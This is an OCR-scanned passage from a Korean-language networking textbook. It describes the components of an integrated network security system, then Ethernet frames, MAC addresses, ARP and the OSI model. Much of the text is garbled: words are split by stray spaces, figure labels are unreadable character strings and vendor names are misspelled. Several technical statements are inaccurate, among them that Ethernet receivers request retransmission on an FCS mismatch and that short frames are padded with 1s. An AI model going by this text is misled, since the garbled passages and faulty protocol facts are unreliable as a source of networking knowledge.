중앙관리체 계의 기본사명 은 망보안체계의 통일적 인 보안방책을 확립하여 그것 을 보안 
구성 요소들에 배 포하며 모든 보안대상들에 대 한 종합적관리 를 진행하는것 이 다. 

중앙관리체계의 기능은 다음과 같다. 

ᄄ 보안대상들과 보안구성 요소들，그것 들의 지 정 학적배 치 에 대 한 정 보자료기 지 
를 보관관리하는 기능 
^ 보안방책규칙기지를 보관관리하는 기능 
여 보안구성 요소들사이 보안통신을 위한 CA 기 능 
^ VPN 체 계 를 위 한 CA 기 능 

중앙관리체계는 중앙관리봉사기와 원격 관리의뢰기들로 구성되 여있다. (그림 1-11) 
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그림 i - ii . 중앙관리체계의 구성 


중앙관리봉사기는 원격관리의뢰기들에 의해 편집，설정，관리되며 편집된 보안방책 및 
설정정 보들을 보안구성 요소들로 배포하여 통일적 인 보안방책 을 확립 하게 된다. 


표 1-2. 부분 X - 

1계별 원격관리의릐기들 

부분체계 

원격관리기들 

방화벽 에 의한 접 근조종체 계 

보안방책 편집기 

VPN 체 계 

보안방책 편집기 

감시기록 및 보고체 계 

보안방책 편집 기，상태 감시기，기 록열 람기，기 록 
통합 및 보고열 람기 

침입검출 및 보호체계 

보안방책 편집기 

말단보호체계 

보안방책 편집기 

중복체계 

보안방책 편집기 

대역폭관리 및 부하분산체계 

보안방책 편집 기，실시 간통신량감시기 


一 방화벽에 의한 접근조종체계 

방화벽접근조종체계의 기본사명은 호스트나 망，혹은 그곳의 사용자들이 다른 호스트 
나 망，혹은 그곳의 자원에 어떻게 접근할수 있는가를 규정하는 보안방책을 세우고 그에 따 
라 접근조종을 진행하는것이다. 

접근조종체계의 기능은 다음과 같다. 


1} 
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그림 1-12. 방화벽접근조종체계의 구성 


방화벽 봉사기 는 망보안체 계 의 기 들 ( Framework ) 을 리 용하여 다른 봉사기 들과 련결되 
여 종합적 인 접근조종기능을 실현한다. 

방화벽접근조종체계의 설정관리는 중앙관리체계의 보안방책편집기에 의 해 진행된다 . 

— VPN 체 계 

VPN 체계의 기본사명은 망 대 망，호스트 대 망사이 통신의 기밀성，완전성，사용자 
식별성을 보장하는것 이 다. 

VPN 체계의 기능은 다음과 같다. 

^ VPN 방책 설정기 능 
^ 인증，암호화，완전성검 증기 능 
^열쇠교환기능 
^ 접근감시 및 기록기능 

체계는 VPN 보안봉사기와 VPN 의뢰기로 구성되여 있다. (그림 1-13) 
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ᄄ 접근방책설정기능 
여 주소변환기능 
ᄄ 파케트 및 내용려과기능 

^ 각종 공격검출 및 차단기능 ( OSI 의 모든 준위의 공격을 포함) 

^사용자인증기능 
^접근감시 및 기록기능 

방화벽접근조종체계는 방화벽봉사기와 각종 인증 및 려과봉사기로 구성되여 있다. (그 
림 1-12) 
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그림 1-13. VPN 체계의 구성 

VPN 보안봉사기 는 다른 VPN 보안봉사기 와 망 대 망 VPN 체 계 를 확립하며 VPN 의 뢰 
기 와 망대호스트 VPN 체 계 를 형 성한다. 

VPN 체계의 설정관리는 중앙관리체계의 보안방책편집기에 의해 진행된다. 

우의 방화벽봉사기 와 VPN 보안봉사기 는 통합되 여있 다. 

一 감시 기록 및 보고체 계 

감시 기 록 및 보고체 계 의 사명 은 모든 보안대 상들과 보안구성 요소들로부터 발생 하는 감 
시기 록자료들을 관리하는것 이 다. 

감시기 록 및 보고체 계 의 기 능은 다음과 같다. 

^ 감시기록자료를 수집하고 자료기지에 보관관리하는 기능 
^ 감시 기 록자료로부터 각종 보고자료를 생 성 하는 기 능 

감시기 록 및 보고체 계 는 기 록봉사기들과 보고봉사기 로 구성되 여있다. (그림 1-14) 
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그림 1-14. 감시기록 및 보고체계의 구성 


기 록봉사기 들은 보안구성 요소들로부터 발생 되 는 감시기 록자료들을 보관하고 그것 을 보 
고봉사기에 넘겨준다. 

보고봉사기 는 기 록자료를 분류，통합하여 보안관리 에 필요한 각종 보고자료를 생 성한다. 

감시기록 및 보고체계의 설정관리는 중앙관리체계의 보안방책편집기，상태감시기，기 
륵열람기，기록통합 및 보고자료열람기에 의해 진행된다. 

감시기록 및 보고체계를 통하여 망통과량분석，수상한 동작들의 검출，망리용상태에 대 
한 수집 등을 진행할수 있다. 

一 침입검출 및 보호체계 

침 입 검 출 및 보호체 계의 기 본사명 은 내부망 ( Intranet ) 을 내부의 침 입 으로 보호하기 위 
한것으로서 각종 침입을 검출하고 차단시킨다. 

일 반적 으로 방화벽 은 외 부의 침 입 으로부터 내 부망을 보호하는 경 계보호자로서 동작하 
며 내부의 침입에 대한 대책은 없다. 이것을 보충하는 체계가 바로 침입검출 및 보호체계 
이다. 

침 입검출 및 보호체계의 기능은 다음과 갈다. 

^ 여 러 가지 LAN 규약에 대 한 각종 침 입검출기능 
^ 방화벽과 련동하여 외부의 공격을 차단하는 기능 
^ 망격 리기능(장치적 기능 - VLAN 기 술) 

^침입검출기륵기능 

침 입 검 출 및 보호체 계 는 침 입 검 출봉사기 ( Sensor ) 와 그것 과 련동하는 방화벽 봉사기 로 
_.(그림 1-15) 




鍾變邊 鍾變變©繼繼 


cfaaft 


>a.aa 

로『네 0내 

기방 보방 














A 1 광. 당보冬귀게년 


a 


청입경 空 
S 사기 



FW 관문 



그림 1-15. 침입검출보호체계의 구성 


침입검출봉사기의 설정관리는 보안방책편집기에서 진행되며 그에 대한 등록정보는 기 
륵 및 보고열 람기 를 통하여 볼수 있다. 

一 말단보호체계 

말단보호체 계의 사명은 말단에 로의 침 입을 검출하고 차단하는것 이 다. 

말단보호체계의 기능은 다음과 같다. 

^ 말단보안방책 설정기 능 
^ 개 인용방화벽기 능 
ᄄ 체계검사기능 
u 반비루스기능 
^접근기록기능 

말단보호체 계는 보안방책봉사기 와 보안의뢰기 로 구성된다. (그림 1-16) 
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그림 1-16. 말단보호체계의 구성 
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그림 1 - 17 . 중복체계의 구성 


무리체 계는 중앙관리체 계의 보안방책 편집 기를 통하여 편집설정되 며 장애회 복이 일어 
날 때의 기록이나 무리체계상태는 기록열람기와 상태감시기를 통하여 볼수 있다. 

— 대역폭관리 및 부하분산체계 

대역폭관리 및 부하분산체계의 기본사명은 봉사별로 대역폭을 관리하며 부하를 무리 
체계의 매 성원들로 분산시킴으로써 보안체계의 성능저하를 막는것이다. 

I 폭관리체계의 기능은 다음과 같다. 
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보안의 뢰 기 들은 보안방책 봉사기 로부터 말단보안방책 을 내 려 받아 설정 한다. 보안방책 
봉사기 의 말단보안방책 은 중앙관리 체 계 의 보안방책 편집 기 에 의 해 작성 된 다. 

보안의뢰 기들의 각종 기 록자료들은 중앙관리체계의 기록열 람기를 통하여 열 람할수 있 
으므로 결과 봉사기로부터 말단에 이르는 통합관리를 진행할수 있게 된다. 

보안의뢰기와 VPN 의뢰기는 통합되여 있다. 

一 중복체 계 

체 계의 정상가동은 통합보안관리의 믿음직한 담보로 된다. 

중복체계 의 사명은 보안구성 요소들이 장애 발생시 에도 정 상가동하도록 하는것 이 다. 이 
사명을 수행하기 위해서는 무리체계를 구죽하여야 한다. 

중복체계의 기능은 다음과 같다. 

^ 접속손실이 없는 투명한 장애회복기능 
^감시기록기능 
^ 자동회 복기 능 

ᄄ 정 상성검 사기능(각종 체 계 자원의 정 상성 을 검 사) 

^부하분산기능 

중복체 계 는 무리 화되 는 두개 이 상의 보안구성 요소들과 감시 대 행 체 ( agent ) 들로 구성 된 
다.(그림 1-17) 
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^대 역폭제 한 및 최소대 역폭조종기능 
亡〒 무게 화된 우선권에 따르는 대역 목조종기 능 

부하분산체 계의 기능은 다음과 같다. 

ᄄ 응용봉사기의 부하에 따르는 평형화된 망통과량 분산기능 
^ 지 능적 인 망통과량 분산기 능 (HTTP 와 같은 대 화층규약에 서 리용) 

대 역 폭관리 체 계 는 대 역 폭조종기 능을 가진 방화벽 봉사기 로 구성 되 며 부하분산체 계 는 부 
하분산기능을 가진 방화벽봉사기 와 응용봉사기 에 설치되는 부하평형대 행체 로 구성된다. (그 
림 1-18) 
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그림 1 - 18 . 부하분산체계 


대 역폭관리체계의 대 역폭관리방책과 부하분산체 계 의 망흐름 분산방책은 중앙관리체 계 
의 보안방책편집 기 에 의해 편집설정 된다. 

대역폭의 변경과정은 실시간망통과량감시기를 통하여 감시 할수 있다. 

1.3.3. 망보안체계의 기틀 ( Framework ) 구성 

통합체계의 우점은 임의로 망보안체계를 확장/축소할수 있으며 새로운 보안기술을 빨 
리 체계에 받아 들일수 있다는것이다. 

보안관문을 중심으로 하는 모든 보안구성요소들의 통합을 원만히 실현하기 위해서는 기 
틀이 있어야 한다. 

그 기 틀은 의뢰기/봉사기 방식의 통신 API 함수들로 구성된다. 

각종 보안봉사기들과 기록들을 포함한 구성요소들은 미 리 규정된 API 함수를 리용하 
여 서로 통신함으로써 체계의 재구성과 확장，갱신을 보다 쉽게 할수 있게 한다. 아래에 기 
틀의 기 본방식 과 그에 기 초한 보안구성 요소들의 일 반적 실 행 방식 을 보여 주었 다. (그림 1-19, 
1 - 20 ) 

기틀은 구성요소안에 있는 모둘들사이，모둘과 구성 요소들사이 통신 api 함 
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성 된다. 례 를 들어 비 루스려 과봉사기 와 보안관문，보안봉사기 와 방화벽 핵 심 부모둘은 통신 
API 함수를 리용하여 서로 통보문을 주고받는다. 


의 si 기프ᄈ스 S 사기프로湖스 



그림 1 - 19 . 기틀 (Framework ) 의 기본방식 
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그림 1-20. 기틀에 기초한 구성요소들의 일반적인 실행방식 
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제4절. 일반적인 망통신에 대한 개념 

를퓨터망에서 통신은 각이한 체계들의 실체사이에서 일어난다. 이 절에서는 망에 련 
결된 체계들사이의 통신에 대해서 고찰한다. 

1.4.1. 자료프레임의 해석 

자료가 망을 통하여 이동할 때 그것 은 프레 임 이 라고 하는 배 포봉투안에 포장된다. 프 
레 임은 망의 위상구조에 따라 다르다. 이써네트프레 임은 통표고리형 이 나 ATM 프레 임과는 
다른 정 보를 가지 고있다. 이써네 트는 현재까지 가장 널 리 쓰이 는 위상구조이 므로 여 기서 
는 그것을 상세히 보기로 한다. 

이써네트프레 임 은 정 보를 나르기 위하여 전송매 체우로 전송되 는 수자식임 플스들의 모 
임 이 다. 하나의 이써 네 트프레 임 은 64~1518 byte 만한 크기 를 가지 며 다음의 4가지 부분으 
로 구성된다. 

^ 준비 신호 ( Preamble ) 

^ 머리 부 ( Header ) 

^ 자료 ( Data ) 

^ 프레 임검 사렬 ( FCS ) 

준비신호는 모든 수신국들에 게 준비할것 을 알리 는 통신 임 플스들의 렬이 다. 표준적 으 
로 준비 신호는 8 byte 길 이 를 가진 다. 

준비신호는 통신과정 의 부분으로 간주되 고 전송되 는 실제 적 인 정 보의 부분은 아니 므 
로 보통 프레 임 의 크기 에는 포함되 지 않는다. 

머리부는 항상 누가 그 프레임을 보냈으며 어디로 가고있는가에 대한 정보를 포함한 
다. 또한 프레 임의 크기 가 몇 byte 인가 하는 정 보도 포함하는데 이것 을 길 이마당이 라고 하 
며 오유수정 에 리 용된 다. 수신국이 길 이마당에 지 적 된것 과 다른 크기 의 프레 임 을 받았다 
면 송신체 계 에 새 로운 프레 임 을 보낼 것 을 요구한다. 길 이마당이 리용되 지 않는다면 머 리 
부는 그 대 신에 어떤 형 식의 이써네트프레 임인가를 설명하는 형식마당을 포함한다. 

머리부의 크기는 항상 14 byte 이다. 

자료부는 그 국이 전송하려는 실제적인 자료와 원천 및 목적지주소와 같은 통신규약 
정보가 포함된다. 이 자료마당은 46~1500 byte 크기이다. 만일 국이 1500 byte 보다 큰 정 
보를 가지 고 있 다면 전송을 위하여 그 정 보를 여 러 개 의 프레 임 으로 조개 고 순서번 호를 리 
용하여 적 당한 순서 를 정 한다. 순서 번 호는 목적 지 체 계 가 그 자료를 재 조립 하는 순서 를 준 
다. 이 순서 정보도 프레임의 자료부에 저장된다. 프레임이 46 byte 만한 정보를 가지고있 
지 못하다면 뒤 에 1을 채워넣는다. 프레 임형식 에 따라 이 부분은 체계 가 어떤 통 
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는 통신방법을 리용하고있는가에 대한 추가적인 정보를 포함할수 있다. 

프레 임 검사렬 ( FCS ) 은 수신된 자료가 실제 로 전송된 자료라는것 을 담보하는데 리 용된 
다. 전송체계는 순환여유검사 또는 CRC 라고 하는 알고리듬을 통하여 그 프레 임의 FCS 
부분을 처 리한다. 이 CRC 는 우의 마당의 값을 취 하여 4 byte 수를 만든다. 목적지체계 가 그 
프레 임 을 수신할 때 같은 CRC 로 계산하고 그것 이 이 마당안의 값과 같은가를 비 교한다. 
목적지체계가 불일치를 발견하면 전송과정에 그 프레임에 오유가 생겼다고 인정하고 그 프 
레임을 다시 보낼것을 송신체계에 요구한다. 

FCS 의 크기는 항상 4 byte 이다. 

—프레임머리부 

이써네트프레임의 머리부에 대하여 더 상세히 고찰하자. 머리부정보는 누가 그 정보 
를 보냈고 어디로 보내는가를 식별하는데서 매우 중요하다. 

머리부는 전송의 원천지와 목적지를 식별하기 위한 두개의 마당을 가지고있다. 이것 
들은 원천체계와 목적체계의 마디점주소들이다. 이 수값을 매체접근조종 ( MAC ) 주소라고 
도 부른다. 마디점주소는 망장치들(망기 판 또는 망하드웨 어)을 식 별하는데 리용되는 유일 
한 주소이며 체계에서 그것을 다른 망장치와 구별하는 유일한 식별자이다. 

두 망장치는 결코 같은 번호로 지정될수 없다. 이것을 전화번호와 같이 생각할수 있 
다. 전화를 가진 매 집에는 유일한 전화번호가 있어서 어느 번호를 호출하면 누가 나온다 
는것 을 아는것과 마찬가지 로 목적지체 계 의 MAC 주소를 리용하여 프레 임 을 보내게 된다. 

이 6 byte , 12자리 16진수는 두 부분으로 나누어 볼수 있다. 주소의 첫 절반부분은 제 
작자의 식별자이 다. 제작자에게 MAC 주소의 한 부분이 배 당되여 자기의 제품들을 식별하 
는데 리 용한다. 중요한 몇 가지 MAC 주소의 부분을 표 1-3 에 보여주었 다. 

MAC 주소의 첫 3 byte 는 고장퇴 치 를 위한 자료로 될수 있 다. 만일 한 문제 를 조사하 
고있다면 그 원천 MAC 주소를 결정하여 보라. 누가 그 장치를 만들었는가를 알면 어느 체 
계가 고장나고 있는가를 쉽게 알수 있다. 실례로 첫 3 byte 가 0000 A 2 이라면 망에서 Bay 
Networks 의 제품들에 주의를 돌리면 될것 이 다. 

MAC 주소의 두번째 부분은 제 작자가 그 장치 에 배 당한 계 렬번호이다. 

주목되는 한가지 주소는 FF - FF - FF - FF - FF-FF 이다. 이것을 방송주소라고 한다. 방 
송주소는 득수한데 그것은 이 파케트를 수신하는 모든 체계가 그 자료를 읽어야 한다는것 
을 의미한다. 만일 한 체계 가 방송주소로 보내지는 한 프레 임 을 만나면 그 프레 임을 읽 고 
그 자료를 처 리 하게 된 다. 
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표 1-3. MAC 주소들 


MAC 주소의 첫 3 byte 

제 작자 

00000 C 

Cisco 

0000 A 2 

Bay Networks 

0080 D 3 

Shiva 

OOAAOO 

Intel 

02608 C 

3 Com 

080009 

Hewlett-Packad 

080020 

Sum 

08005 A 

IBM 


원천마디마당에서 방송주소를 가지는 프레임은 있을수 없다. 이써네트에서는 원천마 
당에 방송주소가 놓이 는 상태 가 존재하지 않는다. 

一 주소변환규약 

목적지마디점주소가 무엇인가를 어떻게 알고 그곳으로 자료를 보낼것인가? 그런데 망 
기판은 전화번호책을 가지고있지 않다. 마디점주소를 구하는것은 주소변환규약 ( ARP ) 프 
레임이라고 하는 특수한 프레임에 의하여 수행된다. ARP 는 어느 통신규약 ( IPX , IP , 
NetBEUI 등) 을 리용하는가에 따라 다르게 동작한다. 

실례로 그림 1-21 을 참고하자. 이것은 같은 망에 있는 다른 체계 에 정보를 보내 려하 
는 체계의 초기파케트를 해 신한것 이 다. 전송체계는 목적체계의 IP 주소를 알고있지만 목 
적지의 마디점주소는 모르고있다. 이 주소가 없으면 자료의 국부적전달은 불가능하다. ARP 
는 체 계 가 목적 지 체 계 의 마디 점 주소를 구하는데 리 용된 다. 

프레 임 해 신은 2진프레 임 전송을 사람이 리 해 할수 있는 형 식 으로 변환하는 과정 이 다. 이 
것 은 보통 망분석프로그람을 리용하여 수행 된 다. 



그림 1-21. 목적지체계의 마디점주소를 얻으려는 전송체계 
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목적 MAC = 生구 A 
원란 MAC-F 



목적 MAC=W 
위천 




W 

그림 1-22. 국부적틍신만을 위하여 리용되는 마디점주소들 


ARP 는 다만 국부적 통신을 위 한것 이 다. 자료파케 트가 경 로기 를 지 나갈 때 이 써 네 트 머 
리 부는 다시 작성 되 는데 원천마디점 주소는 경 로기 의 것 이 고 전송체 계 의 것 은 아니 다. 이 것 
은 새 로운 ARP 요청 이 생성되 여 야 한다는것을 의미한다. 

그림 1-22 는 이것 이 어 떻게 진행되 는가를 보여준다. 전송체 계 F 는 어떤 정 보를 목적 
지체계 界에 보내려고 하고있다. W 는 표와 같은 부분망에 있지 않으므로 그는 국부경로 
기 에 포구 A 의 마디 점 주소를 알기 위 하여 하나의 AHP 를 전송한다. 표가 이 주소를 알면 그 
는 자기의 자료를 경로기에 전송한다. 

이 때 경 로기 는 다음에 광의 마디점 주소를 알기 위하여 포구 묘에 하나의 ARP 를 보낼 
것 이 다. W 가 이 ARP 요구에 응답하면 경 로기 는 그 자료로부터 이써네 트프레 임 을 없애 고 
새것을 만든다. 경로기는 원천마디점주소(원래 표의 마디점주소)를 포구 묘의 마디점주소 
로 바꾼다. 또한 목적지주소(원래 포구 A ) 를 광의 마디점주소와 바꾼다. 

경 로기 가 두 부분망과 통신하기 위 하여서 는 매 포구에 대 하여 하나씩 두개 의 유일한 마 
디 점 주소가 필 요하다. 표가 W 를 공격 하고 있 다면 송신체 계 를 식 별 하기 위하여 W 의 부분 
망의 프레 임안에 있는 원천마디점주소를 리용할수 없다. 원천마디점주소는 그 자료가 어 
디서 이 부분망에 들어갔는가를 표시하므로 원래 의 송신체 계 를 식 별 할수 없다. 

표가 W 와 같은 부분망에 있지 않다는것을 알게 되면 그는 경 로기를 찾게 된다. 체계 
는 자료^ 어떻게 잘 배포할것인가를 결정할 때 그림 1-23 과 같은 공정을 거치게 된다. 일 
부 정보를 어디로 보내는가를 알게 되면 그것은 적당한 ARP 요청을 송신한다. 
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모든 체계는 AHP 요청을 통하여 배운 정보를 보관할수 있다. 실례로 표가 몇초후에 W 
에 게 다른 하나의 자료파케 트를 보내 려 고 한다면 그는 경 로기 의 마디 점 주소를 위한 새 로 
운 ARP 요청을 전송하지 말아야 한다. 왜냐하면 이 값은 기억에 보관되기때문이다. 이 기 
억 구역 을 ARP 완충기 억 ( Cache ) 라고 부론다. 

ARP 완충기억 의 내 용들은 60 s 동안 유지 된다. 그후에 그것 들은 지 워 지 며 다시 새 로운 
ARP 완충기 억표에서 영구적 인 내 용을 만드는 정적 ARP 항목들을 만들수도 있다. 이 렇게 하 
면 정적항목을 가지는 마디점들에 대하여서는 ARP 요청을 전송하지 않아도 된다. 

실례로 표의 기계에 경로기를 위한 정적 ARP 항목을 만들어 놓으면 이 장치를 찾을 때 
ARP 요청 을 전송하지 않아도 된 다. 유일 한 문제 는 경 로기 의 마디점 주소가 변 할 때 제 기 
된다. 만일 경 로기 가 고장나서 그것을 새것으로 바꾼다면 F 체계 에 들어 가서 그 정적 ARP 
항목을 변경 시 켜 야 한다. 왜 냐하면 그것 은 새 경 로기 가 다른 마디점 주소를 가지 고있 
기 때 문이 다. 



그림 1-23. ARP 결정과정 
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一 통신규약의 역 할 

한 체계가 다른 체계에 정보를 전송하려고 한다면 그는 프레임머리부의 목적지마당에 
목표체계의 마디점주소를 가지는 프레 임을 만들어 보내게 된다. 이 통신방법은 해당한 위 
상구조의 통신규칙의 부분이 다. 이 전송은 다음의 문제들을 제기한다. 

ᄄ 전송체계는 프레 임 이 하나의 토막으로 수신되 였다고 가정 하면 되는가? 

@ 목적지체계는《나는 당신의 프레임을 송신하였다. 고맙다!》라고 응답하여야 하 
는가? 

^ 만일 응답을 보내 야 한다면 매개 프레 임 이 자기의 응답을 요구하는가 아니면 프 
레임 들의 한 묶음에 대 하여 하나의 응답을 보내 면 되 는가? 

^ 목적지체계가 같은 국부망에 있지 않다면 자료를 어디로 보낼것인가를 어떻게 해 
결 할것인가? 

^ 목적 지 체 계 가 원천체 계 에 서 전자우편을 운영 하고 파일 을 전송하며 웨 브페 지 들을 
돌아다닌다면 어 느 응용쏘프트웨어 에 이 자료를 쓰는것 인지를 어떻게 알것 인가? 

통신규약의 역할은 바로 이 물음들과 그리고 통신과정에 제기되는 여러 다른 문제들 
에 대 답하는것 이 다. IP , IPX , AppleTalk 또는 NetBEUI 에 대 하여 말할 때 이것은 통신 
규약에 대하여 말하는것이다. 그러면 하나의 통신규약을 특징짓는 설계서가 왜 간단히 그 
위상구조에 의하여 정의되지 않는것 인가? 

그 대답은 다양성때문이라는것이다. IP 의 통신특성들이 이써네트위상구조에 매여있 
다면 모든 망토막들에서 이써네 트를 리용하여 야 할것 이 며 이 것은 광지역 망련결을 포함한 
다. 이 봉사들이 이써네트를 위해서만 준비되여있으므로 통표고리형이나 ATM 을 리용할 
수 없다. 

여러가지 통신규약들을 정의함으로써 지금 이 규칙들은 임의의 OSI 호환 위상구조들 
에 적용될수 있다. 이것이 OSI 모형이 개발되게 된 리유이다. 


1.4.2. OSI 모형 

1977년에 국제표준화기구 ( ISO ) 는 서로 다른 제작자들이 내놓은 체계들사이의 통신 
을 개 선 하기 위 하여 열 린 체 계 호상접 속참조모형 ( OSI 모형 ) 을 개 발하였 다. ISO 는 체 계 들사 
이의 통신을 간단화할것을 주장하고있다. 자료가 먼저 정확한 체계에 도착하고 다음에 리 
용할수 있는 형태로 정확한 응용프로그람에 넘겨지는것을 담보하기 위하여서는 많은 사건 
들이 발생하여 야 한다. 

규칙들의 모임은 통신과정을 간단한 구성블로크들의 모임으로 분할하여야 한다. 


1) 계층구조 
OSI 모형은 물리층， 
성되여 있다. 




자료련결층，망층，전송층，대화층，표현층，응용층의 7개의 계 


錢變邊 鍾變變©繼繼 





A 1 광. 당보冬귀게년 


이 모형 을 개 발하는 과정 에 설계 자들은 자료전송과정 을 구체 적 으로 정 리 하여 가장 기 
본적 인 요소들을 추출하였다. 어떤 망기능이 사용되 였가를 고찰하여 그 기능들을 서 로 다 
른 그룹으로 구분하였고 이렇게 구분된 그롭들은 하나의 계층을 형성하였다. 

매개 계층은 다른 계층과의 구분되는 기능들의 집합으로 정의된다. 이와 같이 기능을 
정의하고 구분함으로써 설계자는 완전하고 유연한 구조를 만들었다. 여기서 가장 중요한 
것은 osi 모형은 서로 다른 체계사이에서 완벽한 호환성을 제공한다는것 이 다. 

2) 계층사이 대면 

자료와 망정보가 송신장치의 매개 계층을 따라 전달되고 다시 수신장치의 매개 계층 
을 따라 거 슬러 올라가는것 은 린접한 계 층사이 대 면을 통하여 이 루어 진다. 매 개 대 면은 한 
계 층이 바로 우의 계 층에 게 제 공해 야 하는 정 보와 봉사를 정 의한다. 망은 각 계 층의 기 능 
과 계층사이 대면을 잘 정의함으로써 모둘성을 가지고있다. 즉 한 계층이 바로 우의 계층 
으로 미리 정의된 봉사를 제공하는 조건에서 다른 계층을 전혀 바꾸지 않고도 그 계층의 기 
능을 실현하는 방식을 변경시키거나 바물수 있다. 

3) 계층의 구성 

7개 의 계 층은 3개 의 그룹으로 나눌수 있 다. 1，2,3계 층에 해 당되 는 물리 층，자료련결 
층，망층은 망지원계 층으로서 한 장치 에 서 다른 장치 에 로 자료를 이 동할 때 필요한 물리 
적 인 즉면 (전기 적 인 규격，물리 적 련결，물리 주소，전송시 간과 믿 음성 등) 을 처 리 한다. 5, 6, 7 
계층에 해 당되는 대화층，표현층，응용층은 사용자지원계층으로 볼수 있다. 이것들은 서로 
련관이 없는 쏘프트웨어체계사이의 호환성을 가능하게 한다. 전송층인 4계층은 우에서 언 
급한 두 그룹을 련결하고 아래층에서 전송한 내용을 웃층이 사용할수 있는 형태가 되도록 한 
다. 

OSI 모형 의 웃층은 거 의 대 부분 쏘프트웨어 로 실현된 다. 아래 층은 거 의 대 부분 하드 
웨어로 구성되는 물리층만을 제외 하고는 하드웨 어와 쏘프트웨어의 조합으로 이루어 진다. 

一 물리층 (physical layer ) 

물리층은 물리 적 인 매 체를 통하여 비트렬을 전송하는데 필요한 기 능을 제 공한다. 

물리 증은 전송매 체，접 속구，신호임 풀스들에 대 해 서 처 리 한다. 반복기 나 집 선기 는 그 
것 이 프레 임 과 관계 없고 전기 신호를 증폭하고 전송하므로 물리층장치 이 다. 

一 자료련결층 (data link layer ) 

자료련결 층은 가공되 지 않은 내 용의 전송을 담당하는 물리층을 믿 음성 있는 련결 로 변 
화시켜준다. 자료련결층은 상위층(망층)에서 볼 때 오유가 없는 물리층처럼 보이도록 하 
는 기 능을 수행한다. 

자료련결층은 국부적체계들사이의 위상관계와 통신에 대해서 처리 한다. 이써 네트는 다 
중물리층 (꼬임 쌍선，빛 케 블) 과 다중망층 ( IPX , IP ) 을 가지 고 동작하므로 자료련 
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표적인 실례로 된다. 자료련결층은 망의 물리적측면(케블이나 수자식임 플스) 을 쏘 프트웨 
어의 추상세계와 자료흐름과 련결시키는 역할을 수행한다. 망다리와 교환기는 프레임관련 
이므로 자료련결층장치로 간주된다. 이것들은 둘 다 자료흐름을 조절하는데서 프레 임머 리 
부의 정보를 리용한다. 



社격미 며 W1 접호하기 위 안 고요구동公 
판리 안 다. [ FTP . NFS , i ' 伯 m 상는요斗자) 
차요탄위는 <_ i ■보로》이다. 


4신자 요도 ■수신자의 자요정버 i 보 S 안다. 
도안 양호와. 따꺅. 보 a . 복호와가 
진뷩된 다. [ Ullfcodft . Asc [0 

차요탄위는 <_i ■보로》이다. 


전정표 선정하고 유치. 대계안다. 

대 와동 기士 보장안다. [ RPC . [내 itEEOS . 

포구예 대 안 士사 J 

차요탄위는 <_i ■보로》이다. 


■종신자와 수신자사이 전속의 신뢰성 유 
i 장안 다. 冬산斗生정표 _i ■하며 _i ■보 로의 
진4과 만리표 진방안다. 아비 =수서표 
조종하고 자요의 관진성 ：3: 않 i 안다. [ TCP , 
ATP. SPXJ 
차도단위는 <도타> 이다. 


장로막과 땅年소士 정의 안다. 

다중■땅 로타포■사이 업今보 민리안다. 
차표단위는〈다비 = >이다. 


마비드머리부와 경■사항유 찬조안다. 

비이타그권보 모비심으 i i 갑와안다. 
오유도 경솬하고 자 Si 툐보 조■포안!다. 
하드미 어年소의 € a^r 진방안다. CFUDC , 
Etllftifliet . TO 차요社위는 
<3너1심>_>1다. 


차도전병:강 위안 몰려적 되 진기적목선：3: 
정의안다. 국 엄今병대약 타수단자수.진付과 
진유谷위표 정의 안다. [ AMS [作比 부무. 

R 5 - £ i £, V . i 5 j 자 S 단위는 <키드 >이!다. 


그림 1-24. OSI 모형 


{I 
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— 망층 (network layer ) 

망증은 파케 트를 송신지 로부터 여 러 가지 망흐름경 로를 동하여 목적 지 까지 전달하는 기 
능을 수행한다. 자료련결층은 같은 망에 있는 두 체 계사이 파케 트전달을 제 공하지 만 망층 
은 파케 트의 송신지 로부터 최 종목적 지 까지 전송을 제 공한다. 

두 체계가 같은 국부망안에 련결되여 있는 경우에는 망층을 필요로 하지 않는다. 그러 
나 두 체계가 경로기를 경유하여 서로 다른 망에 있다면 망층은 발신자로부터 목적지까지 
파케 트전 달을 제 공하게 된 다 . 

망층의 주요기능에는 망주소지정과 경로조종이 있다. 망주소는 물리적으로 련결된 체 
계 들의 한 집 단에 배 당된 이 름 또는 번호이 다. 망주소는 망관리 자에 의 하여 배 당되 며 매 망 
기 판에 배 당되 는 MAC 주소와 혼돈하지 말아야 한다. 망주소의 목적 은 장거 리 자료전송을 쉽 
게 하기 위한것 이 다. 그 기 능은 편지 를 부칠 때 우편번호를 써 넣 는것 과 류사하다. 

IP , IPX 그리 고 AppleTalk 의 데 이 터 그램 배 포규약 ( DDP ) 은 모든 망층기 능의 실례 들 
이다. 봉사 및 응용프로그람의 효과성은 이 준위에서 지적된 기능에 기초하고있다. 

— 전송층 (transport layer ) 

망층은 파케트사이 관계를 인식하지 못하기때 문에 개 별적 인 파케 트에 대 해서 말단에 
서 말단까지 전달을 담당한다. 전송층은 발신지 에서 목적지까지 오유조종과 흐름조종을 제 
공하면서 전체 통신자료가 정확히 도착하도록 한다. 만일 자료가 하나의 프레 임으로서 너 
무 크다면 전송층은 그것 을 보다 작은 토막들로 가르고 순서번호를 붙인 다. 순서번 호는 다 
른 수신체 계 의 전송층에서 그 자료를 원래 의 내 용으로 재 조립할수 있게 한다. 자료련결층 
은 모든 프레 임 들에 대 하여 CRC 검 사를 수행하지 만 전송층은 모든 자료들이 수신되 고 쓸 
수 있 다는것 을 담보하기 위하여 여 벌검 사로서 동작할수 있 다. 전송층기 능의 실례 는 IP 의 
전송조종규약 ( TCP ) , 사용자데 이 터 그램 규약 ( UDP ) , IPX 의 순서 파케 트교환 ( SPX ) , 
AppleTalk 의 ATP 들이다. 

一 대 화층 (session layer ) 

대화층은 둘 또는 그 이상의 체계들사이에서 련결을 설정하고 유지하는것을 취급한다. 
그것은 특정봉사형태에 대한 질문이 정확히 만들어진다는것을 담보한다. 실례로 자기의 웨 
브열 람기 로 한 체 계 에 접 근하려 한다면 이 두 체 계 에 서 대 화층들은 전 자우편 이 아니 라 HTML 
페지들을 받는다는것을 함께 담보하도록 동작한다. 만일 체계 가 여 러개의 망응용프로그람 
들을 돌리 고 있 다면 이 통신들을 순서 대 로 유지 하고 들어 오는 자료가 정 확한 응용프로그 
탐에 로 간다는것 을 담보하는것 은 대 화층까지 이다. 

사실상 대 화층은 하나의 봉사안에서 일의 적 인 대 화를 유지 한다. 실례 로 같은 시 간에 같 
은 웨 브싸이 트로부터 두개 의 다른 웨 브페 지 를 내 려 받기 한다는것 을 생 각해 보라. (같은 를 
퓨터로부터) 대화층은 매 파일전송의 완전성을 유지 하며 두 자료흐름이 섞이지 
